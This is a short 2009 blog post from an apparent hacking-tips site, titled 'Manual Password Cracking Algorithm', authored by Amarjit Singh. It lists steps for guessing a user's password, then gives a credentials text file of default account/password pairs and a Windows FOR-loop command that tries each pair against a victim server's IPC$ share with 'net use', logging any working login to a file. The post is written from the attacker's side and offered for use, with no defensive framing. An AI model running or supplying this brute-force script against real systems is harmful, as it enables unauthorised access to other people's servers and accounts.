Email Login| Link Exchange | Cyber News | Phishing Attack | SQL Injection | SEO | DOS Attack | Hacking Tools | |Hacking Tricks | Penetration Testing | Trojans & Keyloggers |Hacking Videos | General Discussion | Website Hacking | Session Hijacking | Social Engineering | Anonymous Surfing | Recover Passwords | Bypass Firewall | Hacking Books | Network Sniffers | Password Cracking | Enumerating & Fingerprinting | Movies & Songs

Monday, April 20, 2009

Manual Password Cracking Algorithm

Manual Password Cracking Algorithm
  • Find a valid user

  • Create a list of possible passwords

  • Rank the passwords from high probability to low

  • Key in each password

  • If the system allows you in - Success

  • Else try till success

In its simplest form, password cracking can be automated using a simple FOR loop. In the example below, an attacker creates a simple text file with usernames and passwords that are iterated using the FOR loop.

A text file is created to serve as a dictionary from which the main FOR loop will draw usernames and passwords as it iterates through each line:

[file: credentials.txt] administrator "" 
administrator password 
administrator administrator 
[Etc.] 

From a directory that can access the text file the following command is typed:

c:\>FOR /F "tokens=1,2*" %i in (credentials.txt)^
More? do net use \\victim.com\IPC$ %j /u:victim.com\%i^ 
More? 2 >> nul^ 
More? && echo %time% %date% >> outfile.txt^ 
More? && echo \\victim.com acct: %i pass: %j >> outfile.txt 
c:\>type outfile.txt 

If there has been a successfully guessed username and password from credentials.txt, outfile.txt will exist and contain the correct user name and password. The attacker's system will also have an open session with the victim server.
---Regards,
Amarjit Singh

0 Visitor Reactions & Comments: